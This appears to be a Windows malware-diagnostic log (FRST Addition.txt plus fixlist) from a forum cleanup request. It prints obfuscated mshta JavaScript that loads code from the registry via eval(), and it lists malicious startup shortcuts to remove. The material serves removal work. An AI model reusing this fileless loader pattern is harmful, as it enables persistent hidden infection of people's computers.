Task: {81E5946D-A837-4EA1-B26C-3B4F71FD0B3D} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {8CA4CABA-7807-41BC-AAB6-00049AC72548} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {8EF7886D-4812-492B-BADC-02DBDCEB3F5A} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {9FFE5BAE-9E2D-4624-AA2B-DE15303E7A79} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A1D5324F-47C6-4530-8824-C6B4E5EC401F} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A6614028-9517-4EEE-BACC-B097F2B1A56F} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {AD28BEBC-2AED-40E8-B7C6-06EBFF9F32B1} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {B2AE284D-9DD9-442A-A349-D5F4A4AD0844} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {B4A2EC81-1C16-4D3E-9275-A302BE1F49C8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B4D9E1EA-D74E-4E70-BE88-E87448FEB212} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {B6845A6F-8D15-4217-AEC1-11704CC32EE1} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {B83E3A53-FCDF-4B31-98AC-DB794D28C910} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C7F3E5CE-282C-4D59-97CE-2CC1A0287DE7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {C9ED5E49-9E11-4673-82F4-8D342CE058E1} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Task: {CD0C4A4F-7934-4C1C-B5B7-100C05A17EAF} - System32\Tasks\{34CBDC00-3CBA-4835-BC55-E95FC3A0F944} => pcalua.exe -a C:\Users\Dorraine\Downloads\bouncy_snowmen.exe -d C:\Users\Dorraine\Downloads
Task: {CD2C8A99-3A16-49FE-A426-5A21F0049B28} - \Microsoft\Windows\Setup\gwx\rundetector -> No File <==== ATTENTION
Task: {D7D53338-C725-4562-B365-F5547223869C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-12-13] (Adobe Systems Incorporated)
Task: {E1A55A6B-AF6A-4FBD-BA0E-F32178F5A63C} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
Task: {E1DA30AF-E430-47F4-A4A3-0D03A968574D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {E81B0FC1-BB37-4629-964D-9979EA8D3555} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {EB022CFD-2B91-4BE4-BF5A-BB26BEB9DE8B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {F083E0F2-9ED4-4AC1-A705-073D81C43930} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {F20BC99F-B740-4C9E-8EB7-371A89231811} - System32\Tasks\Microsoft\Windows\Setup\UpgradeTriggers\UpgradeNowTask => C:\WINDOWS\System32\GWX\GWXUXWorker.exe
Task: {F2575FD3-6D7D-4BC1-9BFF-3DA6F2E10777} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {F305E9EB-6B8E-483E-A859-144C5B87F227} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {F8C0FB64-4C7D-4CFB-8D81-D74199DDACA8} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {FDC49832-2BBA-446B-B0E9-488A6F92E85F} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Dorraine\AppData\Local\7df78865\5fdf41a0.lnk -> C:\Users\Dorraine\AppData\Local\7df78865\b9023127.bat ()
Shortcut: C:\Users\Dorraine\AppData\Local\360fd\41727.lnk -> C:\Users\Dorraine\AppData\Local\360fd\cf9bd.bat ()

==================== Loaded Modules (Whitelisted) ==============

2016-07-16 06:42 - 2016-07-16 06:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-26 20:16 - 2016-09-26 20:16 - 01864384 _____ () C:\Users\Dorraine\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\amd64\ClientTelemetry.dll
2016-09-26 23:41 - 2016-09-26 23:41 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-12-13 22:59 - 2016-12-09 04:41 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-12-13 22:59 - 2016-12-09 04:40 - 00693248 _____ () C:\Windows\ShellExperiences\MtcUvc.dll
2016-11-08 20:51 - 2016-11-02 05:21 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-11-08 20:51 - 2016-11-02 05:15 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-11-08 20:51 - 2016-11-02 05:14 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-11-08 20:51 - 2016-11-02 05:15 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-11-08 20:51 - 2016-11-02 05:16 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-11-08 20:51 - 2016-11-02 05:17 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-11-08 20:51 - 2016-11-02 05:13 - 00114176 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Dss.BackgroundTask.dll
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-12-16 15:55 - 2016-12-16 15:55 - 63810560 _____ () C:\Users\Dorraine\AppData\Local\0bdc3b3d63\libcef.dll
2016-12-19 10:02 - 2016-12-19 10:02 - 17833560 _____ () C:\Users\Dorraine\AppData\Local\0bdc3b3d63\plugins\pepflashplayer32_24_0_0_186.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:5C321E34 [125]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\3befe: "C:\WINDOWS\system32\mshta.exe" "javascript:xo1HK5M="i2z";l7I2=new ActiveXObject("WScript.Shell");kB7uBa3="b4Nsza";J3iVy2=l7I2.RegRead("HKCU\\software\\fnbc\\szon");PI7TM6="I1PHTLV";eval(J3iVy2);gh4Qj0c="DT5h";" <===== ATTENTION
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\e30a8741: "C:\WINDOWS\system32\mshta.exe" "javascript:YgjdAp2="tW";F5b=new ActiveXObject("WScript.Shell");yCFFDJ5i="c";a6wXv2=F5b.RegRead("HKCU\\software\\ycqzblx\\isbkuu");XgoRnR5L7="BEfn";eval(a6wXv2);TXVMr6="W2";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\localhost -> localhost
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0411dd.com -> 0411dd.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0511zfhl.com -> 0511zfhl.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0632qyw.com -> 0632qyw.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\1001movie.com -> 1001movie.com

There are 6091 more sites.


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: WsAppService => 2
HKLM\...\StartupApproved\Run32: => "Aimersoft Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\StartupApproved\Run: => "Spotify Web Helper"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [MSMQ-In-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => LPort=808
FirewallRules: [{B163DA3D-355A-40AD-BEE9-9FB9E2C152FF}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D0CE8B62-B6BC-4673-A410-6A2F045F14CD}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D1F7E853-6C1A-4009-91E8-74231D828776}] => C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{7FC2EB58-0005-4FBA-8C88-D848CEF76D2F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{66E30416-1ECD-4FC1-B535-9FC79A3BFB79}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{D5DB3676-ADA6-444D-BF97-303E16719040}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{150A971D-796E-460A-9946-4D0DB57590F0}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{8F5D07E7-6D45-4C5C-9037-05DAD0A27745}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{FB15462A-A1F4-4E72-B28A-62B359F2D74F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{56076514-A7BE-4A47-B536-6C1658DBA05D}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exe
FirewallRules: [{4F454C47-904F-4370-B007-FA372696CB67}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{1F425925-0F49-4E3A-9EFB-4164F18CAF22}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{6796C32A-D4FC-4F07-A7CA-74B6A1718A64}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{59AD021A-028E-4125-B679-AA29F604379C}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [TCP Query User{3312017F-DCA5-45EB-A03A-8F7CF93AA496}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{40346371-22B6-4E45-B2EA-4CFFF0CA8709}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{1273B45E-EB79-4706-A0EA-96B31F17F496}C:\users\dorraine\appdata\roaming\spotify\spotify.exe] => C:\users\dorraine\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{D21F287F-8980-4A80-BD50-55EA7519F7F5}C:\users\dorraine\appdata\roaming\spotify\spotify.exe] => C:\users\dorraine\appdata\roaming\spotify\spotify.exe
FirewallRules: [{73E3D461-EE06-40E4-ACB7-63AA2FA38FFC}] => C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{F2AC9C5B-DB98-4E25-9F59-780FE583C00C}] => C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{D845F3E0-1651-4A9E-983B-DBFFE9E31753}] => C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{709A9412-72DC-483D-82D9-E2DC27C0D0D1}] => C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{B9F440A3-7187-4E55-85CB-EB2031F83E61}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{3A4F7DDD-6F1B-4DF7-B0BC-CFB9F537A410}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{746098AE-C767-4ED8-BFE9-2276C9566D7A}C:\program files (x86)\teamviewer\teamviewer.exe] => C:\program files (x86)\teamviewer\teamviewer.exe
FirewallRules: [UDP Query User{887C56BC-951B-4C94-A7B5-8281095FE2E1}C:\program files (x86)\teamviewer\teamviewer.exe] => C:\program files (x86)\teamviewer\teamviewer.exe
FirewallRules: [{47796F37-BB7F-4635-9494-D22ACEA954A3}] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe

==================== Restore Points =========================

10-12-2016 03:50:58 Scheduled Checkpoint
14-12-2016 05:53:45 Windows Update

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/10/2017 10:23:00 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (01/10/2017 10:18:19 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (01/10/2017 06:58:16 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (01/10/2017 06:52:46 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (01/10/2017 06:52:46 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (01/10/2017 06:52:45 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (01/10/2017 06:52:38 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (01/10/2017 06:52:04 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (01/10/2017 06:52:02 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (01/10/2017 06:52:02 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.


System errors:
=============
Error: (01/11/2017 12:13:45 AM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
 and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
 to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.

Error: (01/11/2017 12:13:45 AM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
 and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
 to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.

Error: (01/10/2017 11:38:02 PM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
 and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
 to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.

Error: (01/10/2017 03:52:38 PM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
 and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
 to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.

Error: (01/10/2017 03:52:32 PM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
 and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
 to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.

Error: (01/10/2017 07:01:35 AM) (Source: DCOM) (EventID: 10001) (User: Dorraine-PC)
Description: Unable to start a DCOM Server: App.AppX9s1cz53zc86xn39kwrb02jyft9ecn62r.mca as Unavailable/Unavailable. The error:
"31"
Happened while starting this command:
"C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

Error: (01/10/2017 07:00:51 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {B91D5831-B1BD-4608-8198-D72E155020F7} did not register with DCOM within the required timeout.

Error: (01/10/2017 06:58:51 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {B91D5831-B1BD-4608-8198-D72E155020F7} did not register with DCOM within the required timeout.

Error: (01/10/2017 06:54:58 AM) (Source: DCOM) (EventID: 10010) (User: Dorraine-PC)
Description: The server App.AppXy9rh3t8m2jfpvhhxp6y2ksgeq77vymbq.mca did not register with DCOM within the required timeout.

Error: (01/10/2017 06:52:58 AM) (Source: DCOM) (EventID: 10001) (User: Dorraine-PC)
Description: Unable to start a DCOM Server: App.AppXdca9rykvbm0qn1fw9m2dbx828p2w3h8p.mca as Unavailable/Unavailable. The error:
"31"
Happened while starting this command:
"C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca


==================== Memory info ===========================

Processor: AMD Athlon™ II X2 240 Processor
Percentage of memory in use: 72%
Total physical RAM: 3838.97 MB
Available physical RAM: 1037.39 MB
Total Virtual: 7678.97 MB
Available Virtual: 3211.21 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.22 GB) (Free:422.69 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: BF18BF18)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

==================== End of Addition.txt ====================

 

 

Fixlist.txt:

 

HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*ysrtifhuy<*>] => "C:\Users\Dorraine\AppData\Local\360fd\41727.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*iznt<*>] => "C:\Users\Dorraine\AppData\Local\7df78865\5fdf41a0.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\14d3a.lnk [2017-01-10]
ShortcutTarget: 14d3a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2a0f0a9d.lnk [2017-01-11]
ShortcutTarget: 2a0f0a9d.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8a6b2.lnk [2016-09-26]
ShortcutTarget: 8a6b2.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f943f.lnk [2016-10-11]
ShortcutTarget: f943f.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
S3 dbx; system32\DRIVERS\dbx.sys [X]
U3 idsvc; no ImagePath
2016-12-16 15:55 - 2016-12-16 15:56 - 00000000 ____D C:\Users\Dorraine\AppData\Local\0bdc3b3d63
2016-12-16 15:23 - 2016-12-16 15:23 - 00000000 ____D C:\Users\Dorraine\AppData\Local\7df78865
2016-05-17 14:51 - 2016-05-17 14:51 - 0000016 _____ () C:\ProgramData\mntemp
2016-05-17 14:51 - 2016-05-17 14:51 - 0004131 _____ () C:\ProgramData\rxsmznjf.zcp
Task: {484686E2-A641-42BE-9D60-660116915CFC} - \CCleanerSkipUAC -> No File <==== ATTENTION
Task: {4F03D14B-6E47-455B-83EA-E7A664B87E99} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {59B535FB-DCA8-41C6-9358-EAEAF710653D} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {63AC7C2E-1E01-4A02-84B0-1558549017E4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {67A22A2A-AA15-4F52-AD6A-062D6178B4C1} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {6F4ECD31-E3D7-4C10-B895-82E4C27AA3D0} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {7A59BCF6-FDB6-441C-AFCB-A13B00E6D086} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {7B7D2152-A018-4ECC-B82D-CCE1D62522A4} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
